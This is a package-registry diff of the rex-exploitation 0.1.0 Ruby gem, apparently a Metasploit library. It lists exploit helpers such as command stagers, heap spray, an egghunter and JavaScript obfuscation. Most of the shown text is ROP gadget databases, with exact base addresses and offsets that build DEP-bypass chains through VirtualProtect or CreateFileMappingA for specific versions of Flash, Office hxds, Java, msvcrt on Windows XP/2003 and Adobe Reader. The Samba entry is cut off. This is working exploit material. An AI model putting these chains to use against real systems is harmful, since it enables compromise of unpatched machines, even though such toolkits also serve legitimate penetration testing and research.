rex-exploitation 0.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +7 -0
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +1 -0
- data/.gitignore +9 -0
- data/.rspec +2 -0
- data/.travis.yml +5 -0
- data/CODE_OF_CONDUCT.md +74 -0
- data/Gemfile +4 -0
- data/README.md +33 -0
- data/Rakefile +6 -0
- data/bin/console +14 -0
- data/bin/setup +8 -0
- data/data/exploits/cmdstager/debug_asm +91 -0
- data/data/exploits/cmdstager/debug_write +819 -0
- data/data/exploits/cmdstager/vbs_b64 +40 -0
- data/data/exploits/cmdstager/vbs_b64_adodb +50 -0
- data/data/exploits/cmdstager/vbs_b64_noquot +49 -0
- data/data/exploits/cmdstager/vbs_b64_sleep +41 -0
- data/data/js/detect/ie_addons.js +89 -0
- data/data/js/detect/misc_addons.js +157 -0
- data/data/js/detect/os.js +831 -0
- data/data/js/memory/explib2/lib/explib2.js +426 -0
- data/data/js/memory/explib2/payload/drop_exec.js +33 -0
- data/data/js/memory/explib2/payload/exec.js +10 -0
- data/data/js/memory/heap_spray.js +17 -0
- data/data/js/memory/heaplib2.js +192 -0
- data/data/js/memory/mstime_malloc.js +31 -0
- data/data/js/memory/property_spray.js +38 -0
- data/data/js/network/ajax_download.js +18 -0
- data/data/js/network/ajax_post.js +18 -0
- data/data/js/network/xhr_shim.js +15 -0
- data/data/js/utils/base64.js +126 -0
- data/data/ropdb/flash.xml +80 -0
- data/data/ropdb/hxds.xml +66 -0
- data/data/ropdb/java.xml +33 -0
- data/data/ropdb/msvcrt.xml +71 -0
- data/data/ropdb/reader.xml +132 -0
- data/data/ropdb/samba.xml +436 -0
- data/data/ropdb/stagefright.xml +225 -0
- data/lib/rex/exploitation.rb +7 -0
- data/lib/rex/exploitation/cmdstager.rb +11 -0
- data/lib/rex/exploitation/cmdstager/base.rb +189 -0
- data/lib/rex/exploitation/cmdstager/bourne.rb +118 -0
- data/lib/rex/exploitation/cmdstager/certutil.rb +114 -0
- data/lib/rex/exploitation/cmdstager/debug_asm.rb +139 -0
- data/lib/rex/exploitation/cmdstager/debug_write.rb +133 -0
- data/lib/rex/exploitation/cmdstager/echo.rb +166 -0
- data/lib/rex/exploitation/cmdstager/printf.rb +121 -0
- data/lib/rex/exploitation/cmdstager/tftp.rb +70 -0
- data/lib/rex/exploitation/cmdstager/vbs.rb +125 -0
- data/lib/rex/exploitation/egghunter.rb +423 -0
- data/lib/rex/exploitation/encryptjs.rb +79 -0
- data/lib/rex/exploitation/heaplib.js.b64 +331 -0
- data/lib/rex/exploitation/heaplib.rb +107 -0
- data/lib/rex/exploitation/js.rb +6 -0
- data/lib/rex/exploitation/js/detect.rb +70 -0
- data/lib/rex/exploitation/js/memory.rb +80 -0
- data/lib/rex/exploitation/js/network.rb +83 -0
- data/lib/rex/exploitation/js/utils.rb +32 -0
- data/lib/rex/exploitation/jsobfu.rb +17 -0
- data/lib/rex/exploitation/obfuscatejs.rb +336 -0
- data/lib/rex/exploitation/omelet.rb +321 -0
- data/lib/rex/exploitation/opcodedb.rb +819 -0
- data/lib/rex/exploitation/ropdb.rb +190 -0
- data/lib/rex/exploitation/seh.rb +93 -0
- data/lib/rex/exploitation/version.rb +5 -0
- data/rex-exploitation.gemspec +35 -0
- metadata +298 -0
- metadata.gz.sig +0 -0
|
@@ -0,0 +1,80 @@
|
|
|
1
|
+
<?xml version="1.0" encoding="ISO-8859-1"?>
|
|
2
|
+
<db>
|
|
3
|
+
<rop>
|
|
4
|
+
<compatibility>
|
|
5
|
+
<target>11.3.300.257</target>
|
|
6
|
+
</compatibility>
|
|
7
|
+
|
|
8
|
+
<gadgets base="0x10000000">
|
|
9
|
+
<gadget offset="0x00243043">POP EAX # RETN</gadget>
|
|
10
|
+
<gadget offset="0x006e3384">ptr to VirtualProtect()</gadget>
|
|
11
|
+
<gadget offset="0x0044a4aa">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
|
|
12
|
+
<gadget offset="0x003d54df">XCHG EAX,ESI # RETN</gadget>
|
|
13
|
+
<gadget offset="0x005f0b25">POP EBP # RETN</gadget>
|
|
14
|
+
<gadget offset="0x002ed0f1">jmp esp</gadget>
|
|
15
|
+
<gadget offset="0x003eb988">POP EBX # RETN</gadget>
|
|
16
|
+
<gadget value="0x00000400">0x00000400-> ebx</gadget>
|
|
17
|
+
<gadget offset="0x00662e60">POP EDX # RETN</gadget>
|
|
18
|
+
<gadget value="0x00000040">0x00000040-> edx</gadget>
|
|
19
|
+
<gadget offset="0x0058289d">POP ECX # RETN</gadget>
|
|
20
|
+
<gadget offset="0x00955ebe">Writable location</gadget>
|
|
21
|
+
<gadget offset="0x00414e84">POP EDI # RETN</gadget>
|
|
22
|
+
<gadget offset="0x004de801">RETN (ROP NOP)</gadget>
|
|
23
|
+
<gadget offset="0x0024044c">POP EAX # RETN</gadget>
|
|
24
|
+
<gadget value="nop">nop</gadget>
|
|
25
|
+
<gadget offset="0x00627674">PUSHAD # RETN</gadget>
|
|
26
|
+
</gadgets>
|
|
27
|
+
</rop>
|
|
28
|
+
|
|
29
|
+
<rop>
|
|
30
|
+
<compatibility>
|
|
31
|
+
<target>11.3.300.265</target>
|
|
32
|
+
</compatibility>
|
|
33
|
+
|
|
34
|
+
<gadgets base="0x10000000">
|
|
35
|
+
<gadget offset="0x00487414">POP EAX # RETN</gadget>
|
|
36
|
+
<gadget offset="0x006e338c">ptr to VirtualProtect()</gadget>
|
|
37
|
+
<gadget offset="0x00437d39">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
|
|
38
|
+
<gadget offset="0x0008f9c6">XCHG EAX,ESI # RETN</gadget>
|
|
39
|
+
<gadget offset="0x000baf77">POP EBP # RETN</gadget>
|
|
40
|
+
<gadget offset="0x002d8d5c">jmp esp</gadget>
|
|
41
|
+
<gadget offset="0x00005604">POP EBX # RETN</gadget>
|
|
42
|
+
<gadget value="0x00000400">0x00000400-> ebx</gadget>
|
|
43
|
+
<gadget offset="0x0064a4d7">POP EDX # RETN</gadget>
|
|
44
|
+
<gadget value="0x00000040">0x00000040-> edx</gadget>
|
|
45
|
+
<gadget offset="0x004087db">POP ECX # RETN</gadget>
|
|
46
|
+
<gadget offset="0x00955197">Writable location</gadget>
|
|
47
|
+
<gadget offset="0x005be57f">POP EDI # RETN</gadget>
|
|
48
|
+
<gadget offset="0x003a0002">RETN (ROP NOP)</gadget>
|
|
49
|
+
<gadget offset="0x00244a82">POP EAX # RETN</gadget>
|
|
50
|
+
<gadget value="nop">nop</gadget>
|
|
51
|
+
<gadget offset="0x004cbc7f">PUSHAD # RETN</gadget>
|
|
52
|
+
</gadgets>
|
|
53
|
+
</rop>
|
|
54
|
+
|
|
55
|
+
<rop>
|
|
56
|
+
<compatibility>
|
|
57
|
+
<target>11.3.300.268</target>
|
|
58
|
+
</compatibility>
|
|
59
|
+
|
|
60
|
+
<gadgets base="0x10000000">
|
|
61
|
+
<gadget offset="0x0012429b">POP ECX # RETN</gadget>
|
|
62
|
+
<gadget offset="0x006e438c">ptr to VirtualProtect()</gadget>
|
|
63
|
+
<gadget offset="0x00481a7d">MOV EAX,DWORD PTR DS:[ECX]</gadget>
|
|
64
|
+
<gadget offset="0x006ae8d7">XCHG EAX,ESI # RETN</gadget>
|
|
65
|
+
<gadget offset="0x000a6b69">POP EBP # RETN</gadget>
|
|
66
|
+
<gadget offset="0x002b95bb">jmp esp</gadget>
|
|
67
|
+
<gadget offset="0x0027f328">POP EBX # RETN</gadget>
|
|
68
|
+
<gadget value="0x00000400">0x00000400-> ebx</gadget>
|
|
69
|
+
<gadget offset="0x00686fe5">POP EDX # RETN</gadget>
|
|
70
|
+
<gadget value="0x00000040">0x00000040-> edx</gadget>
|
|
71
|
+
<gadget offset="0x0017e345">POP ECX # RETN</gadget>
|
|
72
|
+
<gadget offset="0x0092027a">Writable location</gadget>
|
|
73
|
+
<gadget offset="0x002a394a">POP EDI # RETN</gadget>
|
|
74
|
+
<gadget offset="0x00593802"># RETN (ROP NOP)</gadget>
|
|
75
|
+
<gadget offset="0x002447d1">POP EAX # RETN</gadget>
|
|
76
|
+
<gadget value="nop">nop</gadget>
|
|
77
|
+
<gadget offset="0x0062857d">PUSHAD # RETN</gadget>
|
|
78
|
+
</gadgets>
|
|
79
|
+
</rop>
|
|
80
|
+
</db>
|
data/data/ropdb/hxds.xml
ADDED
|
@@ -0,0 +1,66 @@
|
|
|
1
|
+
<?xml version="1.0" encoding="ISO-8859-1"?>
|
|
2
|
+
<db>
|
|
3
|
+
<rop>
|
|
4
|
+
<compatibility>
|
|
5
|
+
<target>2007</target>
|
|
6
|
+
</compatibility>
|
|
7
|
+
|
|
8
|
+
<gadgets base="0x51bd0000">
|
|
9
|
+
<gadget offset="0x000750fd">POP EAX # RETN</gadget>
|
|
10
|
+
<gadget offset="0x00001158">ptr to VirtualProtect()</gadget>
|
|
11
|
+
<gadget offset="0x0001803c">POP EBP # RETN</gadget>
|
|
12
|
+
<gadget offset="0x0001803c">skip 4 bytes</gadget>
|
|
13
|
+
<gadget offset="0x0001750f">POP EBX # RETN</gadget>
|
|
14
|
+
<gadget value="safe_negate_size">Safe size to NEG</gadget>
|
|
15
|
+
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
|
|
16
|
+
<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
|
|
17
|
+
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
|
|
18
|
+
<gadget offset="0x0002a7d8">POP EDX # RETN</gadget>
|
|
19
|
+
<gadget value="ffffffc0">0x00000040</gadget>
|
|
20
|
+
<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
|
|
21
|
+
<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
|
|
22
|
+
<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
|
|
23
|
+
<gadget offset="0x000406e9">POP ECX # RETN</gadget>
|
|
24
|
+
<gadget offset="0x0008bfae">Writable location</gadget>
|
|
25
|
+
<gadget offset="0x0003cc24">POP EDI # RETN</gadget>
|
|
26
|
+
<gadget offset="0x0004df8a">RETN (ROP NOP)</gadget>
|
|
27
|
+
<gadget offset="0x0002d94b">POP ESI # RETN</gadget>
|
|
28
|
+
<gadget offset="0x0002c840">JMP [EAX]</gadget>
|
|
29
|
+
<gadget offset="0x0003a4ec">PUSHAD # RETN</gadget>
|
|
30
|
+
<gadget offset="0x0007a9f3">ptr to 'jmp esp'</gadget>
|
|
31
|
+
</gadgets>
|
|
32
|
+
</rop>
|
|
33
|
+
|
|
34
|
+
<rop>
|
|
35
|
+
<compatibility>
|
|
36
|
+
<target>2010</target>
|
|
37
|
+
</compatibility>
|
|
38
|
+
|
|
39
|
+
<gadgets base="0x51bd0000">
|
|
40
|
+
<gadget offset="0x0003e4fa">POP EBP # RETN</gadget>
|
|
41
|
+
<gadget offset="0x0003e4fa">skip 4 bytes</gadget>
|
|
42
|
+
<gadget offset="0x0006a2b4">POP EBX # RETN</gadget>
|
|
43
|
+
<gadget value="safe_negate_size">Safe size to NEG</gadget>
|
|
44
|
+
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
|
|
45
|
+
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
|
|
46
|
+
<gadget value="junk">JUNK</gadget>
|
|
47
|
+
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
|
|
48
|
+
<gadget offset="0x0002a429">POP EDX # RETN</gadget>
|
|
49
|
+
<gadget value="ffffffc0">0x00000040</gadget>
|
|
50
|
+
<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
|
|
51
|
+
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
|
|
52
|
+
<gadget value="junk">JUNK</gadget>
|
|
53
|
+
<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
|
|
54
|
+
<gadget offset="0x0006c4b1">POP ECX # RETN</gadget>
|
|
55
|
+
<gadget offset="0x0008c638">Writable location</gadget>
|
|
56
|
+
<gadget offset="0x0000be1d">POP EDI # RETN</gadget>
|
|
57
|
+
<gadget offset="0x00005383">RETN (ROP NOP)</gadget>
|
|
58
|
+
<gadget offset="0x00073335">POP ESI # RETN</gadget>
|
|
59
|
+
<gadget offset="0x0002c7cb">JMP [EAX]</gadget>
|
|
60
|
+
<gadget offset="0x00076452">POP EAX # RETN</gadget>
|
|
61
|
+
<gadget offset="0x000010b8">ptr to VirtualProtect()</gadget>
|
|
62
|
+
<gadget offset="0x0006604e">PUSHAD # RETN</gadget>
|
|
63
|
+
<gadget offset="0x00014534">ptr to 'jmp esp'</gadget>
|
|
64
|
+
</gadgets>
|
|
65
|
+
</rop>
|
|
66
|
+
</db>
|
data/data/ropdb/java.xml
ADDED
|
@@ -0,0 +1,33 @@
|
|
|
1
|
+
<?xml version="1.0" encoding="ISO-8859-1"?>
|
|
2
|
+
<db>
|
|
3
|
+
<rop>
|
|
4
|
+
<compatibility>
|
|
5
|
+
<target>*</target>
|
|
6
|
+
</compatibility>
|
|
7
|
+
|
|
8
|
+
<gadgets base="0x7c340000">
|
|
9
|
+
<gadget offset="0x00024c66">POP EBP # RETN</gadget>
|
|
10
|
+
<gadget offset="0x00024c66">skip 4 bytes</gadget>
|
|
11
|
+
<gadget offset="0x00004edc">POP EAX # RETN</gadget>
|
|
12
|
+
<gadget value="safe_negate_size">0x00000201</gadget>
|
|
13
|
+
<gadget offset="0x00011e05">NEG EAX # RETN</gadget>
|
|
14
|
+
<gadget offset="0x000136e3">POP EBX # RETN</gadget>
|
|
15
|
+
<gadget value="0xffffffff"></gadget>
|
|
16
|
+
<gadget offset="0x00005255">INC EBX # FPATAN # RETN</gadget>
|
|
17
|
+
<gadget offset="0x0001218e">ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN</gadget>
|
|
18
|
+
<gadget offset="0x00005937">POP EDX # RETN</gadget>
|
|
19
|
+
<gadget value="0xffffffc0">0x00000040</gadget>
|
|
20
|
+
<gadget offset="0x00011eb1">NEG EDX # RETN</gadget>
|
|
21
|
+
<gadget offset="0x0002c5b9">POP ECX # RETN</gadget>
|
|
22
|
+
<gadget offset="0x00051e67">Writable location</gadget>
|
|
23
|
+
<gadget offset="0x00002e58">POP EDI # RETN</gadget>
|
|
24
|
+
<gadget offset="0x0000d202">RETN (ROP NOP)</gadget>
|
|
25
|
+
<gadget offset="0x0000f8f4">POP ESI # RETN</gadget>
|
|
26
|
+
<gadget offset="0x000015a2">JMP [EAX]</gadget>
|
|
27
|
+
<gadget offset="0x00004edc">POP EAX # RETN</gadget>
|
|
28
|
+
<gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
|
|
29
|
+
<gadget offset="0x00038c81">PUSHAD # ADD AL,0EF # RETN</gadget>
|
|
30
|
+
<gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
|
|
31
|
+
</gadgets>
|
|
32
|
+
</rop>
|
|
33
|
+
</db>
|
|
@@ -0,0 +1,71 @@
|
|
|
1
|
+
<?xml version="1.0" encoding="ISO-8859-1"?>
|
|
2
|
+
<db>
|
|
3
|
+
<rop>
|
|
4
|
+
<compatibility>
|
|
5
|
+
<target>WINDOWS XP SP2</target>
|
|
6
|
+
<target>WINDOWS XP SP3</target>
|
|
7
|
+
</compatibility>
|
|
8
|
+
|
|
9
|
+
<gadgets base="0x77c10000">
|
|
10
|
+
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
|
|
11
|
+
<gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
|
|
12
|
+
<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
|
|
13
|
+
<gadget value="junk">JUNK</gadget>
|
|
14
|
+
<gadget offset="0x0001362c">POP EBX # RETN</gadget>
|
|
15
|
+
<gadget offset="0x0004d9bb">Writable location</gadget>
|
|
16
|
+
<gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
|
|
17
|
+
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
|
|
18
|
+
<gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
|
|
19
|
+
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
|
|
20
|
+
<gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
|
|
21
|
+
<gadget value="junk">JUNK</gadget>
|
|
22
|
+
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
|
|
23
|
+
<gadget offset="0x0002ee15">POP EBP # RETN</gadget>
|
|
24
|
+
<gadget offset="0x0002ee15">skip 4 bytes</gadget>
|
|
25
|
+
<gadget offset="0x0002eeef">POP ECX # RETN</gadget>
|
|
26
|
+
<gadget offset="0x0004d9bb">Writable location</gadget>
|
|
27
|
+
<gadget offset="0x0001a88c">POP EDI # RETN</gadget>
|
|
28
|
+
<gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
|
|
29
|
+
<gadget offset="0x0002a184">POP ESI # RETN</gadget>
|
|
30
|
+
<gadget offset="0x0001aacc">JMP [EAX]</gadget>
|
|
31
|
+
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
|
|
32
|
+
<gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
|
|
33
|
+
<gadget offset="0x00002df9">PUSHAD # RETN</gadget>
|
|
34
|
+
<gadget offset="0x00025459">ptr to 'push esp # ret</gadget>
|
|
35
|
+
</gadgets>
|
|
36
|
+
</rop>
|
|
37
|
+
|
|
38
|
+
<rop>
|
|
39
|
+
<compatibility>
|
|
40
|
+
<target>WINDOWS SERVER 2003 SP1</target>
|
|
41
|
+
<target>WINDOWS SERVER 2003 SP2</target>
|
|
42
|
+
</compatibility>
|
|
43
|
+
|
|
44
|
+
<gadgets base="0x77ba0000">
|
|
45
|
+
<gadget offset="0x00012563">POP EAX # RETN</gadget>
|
|
46
|
+
<gadget offset="0x00001114">VirtualProtect()</gadget>
|
|
47
|
+
<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
|
|
48
|
+
<gadget value="junk">JUNK</gadget>
|
|
49
|
+
<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
|
|
50
|
+
<gadget offset="0x00029801">POP EBP # RETN</gadget>
|
|
51
|
+
<gadget offset="0x00042265">ptr to 'push esp # ret'</gadget>
|
|
52
|
+
<gadget offset="0x00012563">POP EAX # RETN</gadget>
|
|
53
|
+
<gadget value="0x03C0990F">EAX</gadget>
|
|
54
|
+
<gadget offset="0x0003d441">SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)</gadget>
|
|
55
|
+
<gadget offset="0x000148d3">POP EBX, RET</gadget>
|
|
56
|
+
<gadget offset="0x000521e0">.data</gadget>
|
|
57
|
+
<gadget offset="0x0001f102">XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN</gadget>
|
|
58
|
+
<gadget offset="0x0001fc02">POP ECX # RETN</gadget>
|
|
59
|
+
<gadget offset="0x0004f001">W pointer (lpOldProtect) (-> ecx)</gadget>
|
|
60
|
+
<gadget offset="0x00038c04">POP EDI # RETN</gadget>
|
|
61
|
+
<gadget offset="0x00038c05">ROP NOP (-> edi)</gadget>
|
|
62
|
+
<gadget offset="0x00012563">POP EAX # RETN</gadget>
|
|
63
|
+
<gadget value="0x03C0944F">EAX</gadget>
|
|
64
|
+
<gadget offset="0x0003d441">SUB EAX, 03c0940f</gadget>
|
|
65
|
+
<gadget offset="0x00018285">XCHG EAX,EDX # RETN</gadget>
|
|
66
|
+
<gadget offset="0x00012563">POP EAX # RETN</gadget>
|
|
67
|
+
<gadget value="nop">NOP</gadget>
|
|
68
|
+
<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
|
|
69
|
+
</gadgets>
|
|
70
|
+
</rop>
|
|
71
|
+
</db>
|
|
@@ -0,0 +1,132 @@
|
|
|
1
|
+
<?xml version="1.0" encoding="ISO-8859-1"?>
|
|
2
|
+
<db>
|
|
3
|
+
|
|
4
|
+
<rop>
|
|
5
|
+
<compatibility>
|
|
6
|
+
<target>9</target>
|
|
7
|
+
</compatibility>
|
|
8
|
+
|
|
9
|
+
<gadgets base="0x4a800000">
|
|
10
|
+
<gadget offset="0x2313d">pop ecx # ret</gadget>
|
|
11
|
+
<gadget offset="0x2a713">push eax # pop esp # ret</gadget>
|
|
12
|
+
<gadget offset="0x01f90">pop eax # ret</gadget>
|
|
13
|
+
<gadget offset="0x49038">ptr to CreateFileMappingA()</gadget>
|
|
14
|
+
<gadget offset="0x07e7d">call [eax] # ret</gadget>
|
|
15
|
+
<gadget value="0xffffffff">HANDLE hFile</gadget>
|
|
16
|
+
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
|
|
17
|
+
<gadget value="0x00000040">DWORD flProtect</gadget>
|
|
18
|
+
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
|
|
19
|
+
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
|
|
20
|
+
<gadget value="0x00000000">LPCTSTR lpName</gadget>
|
|
21
|
+
<gadget offset="0x0155a">pop edi # ret</gadget>
|
|
22
|
+
<gadget offset="0x43a84">pop ebp # pop ebx # pop ecx # ret</gadget>
|
|
23
|
+
<gadget offset="0x2d4de">pop ebx # ret</gadget>
|
|
24
|
+
<gadget offset="0x01f90">pop eax # ret</gadget>
|
|
25
|
+
<gadget offset="0x476aa">pop ecx # ret</gadget>
|
|
26
|
+
<gadget offset="0x49030">ptr to MapViewOfFile()</gadget>
|
|
27
|
+
<gadget offset="0x44122">mov edx, ecx</gadget>
|
|
28
|
+
<gadget offset="0x476aa">pop ecx # ret</gadget>
|
|
29
|
+
<gadget offset="0x07e7d">call [eax] # ret</gadget>
|
|
30
|
+
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
|
|
31
|
+
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
|
|
32
|
+
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
|
|
33
|
+
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
|
|
34
|
+
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
|
|
35
|
+
<gadget offset="0x43a82">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
|
|
36
|
+
<gadget offset="0x46c5e">jmp IAT msvcr80!memcpy</gadget>
|
|
37
|
+
<gadget offset="0x476ab">ret</gadget>
|
|
38
|
+
<gadget value="junk">JUNK</gadget>
|
|
39
|
+
<gadget value="0x00000400">memcpy length</gadget>
|
|
40
|
+
<gadget value="junk">JUNK</gadget>
|
|
41
|
+
<gadget offset="0x17984">xchg eax, ebp # ret</gadget>
|
|
42
|
+
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
|
|
43
|
+
</gadgets>
|
|
44
|
+
</rop>
|
|
45
|
+
|
|
46
|
+
<rop>
|
|
47
|
+
<compatibility>
|
|
48
|
+
<target>10</target>
|
|
49
|
+
</compatibility>
|
|
50
|
+
|
|
51
|
+
<gadgets base="0x4a800000">
|
|
52
|
+
<gadget offset="0x26015">pop ecx # ret</gadget>
|
|
53
|
+
<gadget offset="0x2e090">push eax # pop esp # ret</gadget>
|
|
54
|
+
<gadget offset="0x2007d">pop eax # ret</gadget>
|
|
55
|
+
<gadget offset="0x50038">ptr to CreateFileMappingA()</gadget>
|
|
56
|
+
<gadget offset="0x246d5">call [eax] # ret</gadget>
|
|
57
|
+
<gadget value="0xffffffff">HANDLE hFile</gadget>
|
|
58
|
+
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
|
|
59
|
+
<gadget value="0x00000040">DWORD flProtect</gadget>
|
|
60
|
+
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
|
|
61
|
+
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
|
|
62
|
+
<gadget value="0x00000000">LPCTSTR lpName</gadget>
|
|
63
|
+
<gadget offset="0x05016">pop edi # ret</gadget>
|
|
64
|
+
<gadget offset="0x4420c">pop ebp # pop ebx # pop ecx # ret</gadget>
|
|
65
|
+
<gadget offset="0x14241">pop ebx # ret</gadget>
|
|
66
|
+
<gadget offset="0x2007d">pop eax # ret</gadget>
|
|
67
|
+
<gadget offset="0x26015">pop ecx # ret</gadget>
|
|
68
|
+
<gadget offset="0x50030">ptr to MapViewOfFile()</gadget>
|
|
69
|
+
<gadget offset="0x4b49d">mov edx, ecx</gadget>
|
|
70
|
+
<gadget offset="0x26015">pop ecx # ret</gadget>
|
|
71
|
+
<gadget offset="0x246d5">call [eax] # ret</gadget>
|
|
72
|
+
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
|
|
73
|
+
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
|
|
74
|
+
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
|
|
75
|
+
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
|
|
76
|
+
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
|
|
77
|
+
<gadget offset="0x14013">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
|
|
78
|
+
<gadget offset="0x4e036">jmp to IAT msvcr90!memcpy</gadget>
|
|
79
|
+
<gadget offset="0x2a8df">ret</gadget>
|
|
80
|
+
<gadget value="junk">JUNK</gadget>
|
|
81
|
+
<gadget value="0x00000400">memcpy length</gadget>
|
|
82
|
+
<gadget value="junk">JUNK</gadget>
|
|
83
|
+
<gadget offset="0x18b31">xchg eax, ebp # ret</gadget>
|
|
84
|
+
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
|
|
85
|
+
</gadgets>
|
|
86
|
+
</rop>
|
|
87
|
+
|
|
88
|
+
<rop>
|
|
89
|
+
<compatibility>
|
|
90
|
+
<target>11</target>
|
|
91
|
+
</compatibility>
|
|
92
|
+
|
|
93
|
+
<gadgets base="0x4a800000">
|
|
94
|
+
<gadget offset="0x5822c">pop ecx # ret</gadget>
|
|
95
|
+
<gadget offset="0x2f129">push eax # pop esp # ret</gadget>
|
|
96
|
+
<gadget offset="0x5597f">pop eax # ret</gadget>
|
|
97
|
+
<gadget offset="0x66038">ptr to CreateFileMappingA()</gadget>
|
|
98
|
+
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
|
|
99
|
+
<gadget value="0xffffffff">HANDLE hFile</gadget>
|
|
100
|
+
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
|
|
101
|
+
<gadget value="0x00000040">DWORD flProtect</gadget>
|
|
102
|
+
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
|
|
103
|
+
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
|
|
104
|
+
<gadget value="0x00000000">LPCTSTR lpName</gadget>
|
|
105
|
+
<gadget offset="0x55093">pop edi # ret</gadget>
|
|
106
|
+
<gadget value="junk">JUNK</gadget>
|
|
107
|
+
<gadget offset="0x50030">pop ebx # pop esi # pop ebp # ret</gadget>
|
|
108
|
+
<gadget offset="0x5597f">pop eax # ret</gadget>
|
|
109
|
+
<gadget offset="0x50031">pop esi # pop ebp # ret</gadget>
|
|
110
|
+
<gadget value="junk">JUNK</gadget>
|
|
111
|
+
<gadget offset="0x5822c">pop ecx # ret</gadget>
|
|
112
|
+
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
|
|
113
|
+
<gadget offset="0x5d4f8">pop edx # ret</gadget>
|
|
114
|
+
<gadget offset="0x66030">ptr to MapViewOfFile()</gadget>
|
|
115
|
+
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
|
|
116
|
+
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
|
|
117
|
+
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
|
|
118
|
+
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
|
|
119
|
+
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
|
|
120
|
+
<gadget offset="0x14856">pop edi # pop esi # pop ebp # ret</gadget>
|
|
121
|
+
<gadget offset="0x505a0">memcpy address</gadget>
|
|
122
|
+
<gadget offset="0x60bc4">call eax # ret</gadget>
|
|
123
|
+
<gadget offset="0x505a0">memcpy address</gadget>
|
|
124
|
+
<gadget offset="0x1c376">xchg eax, ebp # ret</gadget>
|
|
125
|
+
<gadget offset="0x463d0">pop ebx # ret</gadget>
|
|
126
|
+
<gadget value="0x00000400">memcpy length</gadget>
|
|
127
|
+
<gadget offset="0x5d4f8">pop edx # ret</gadget>
|
|
128
|
+
<gadget offset="0x5d4f8">pop edx # ret</gadget>
|
|
129
|
+
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
|
|
130
|
+
</gadgets>
|
|
131
|
+
</rop>
|
|
132
|
+
</db>
|
|
@@ -0,0 +1,436 @@
|
|
|
1
|
+
<?xml version="1.0" encoding="ISO-8859-1"?>
|
|
2
|
+
<db>
|
|
3
|
+
<rop>
|
|
4
|
+
<compatibility>
|
|
5
|
+
<target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
|
|
6
|
+
</compatibility>
|
|
7
|
+
|
|
8
|
+
<!--
|
|
9
|
+
dpkg -l|grep libgcrypt
|
|
10
|
+
ii libgcrypt11 1.4.5-2 LGPL Crypto library - runtime library
|
|
11
|
+
b6977000-b69e8000 r-xp 00000000 08:01 160176 /usr/lib/libgcrypt.so.11.5.3
|
|
12
|
+
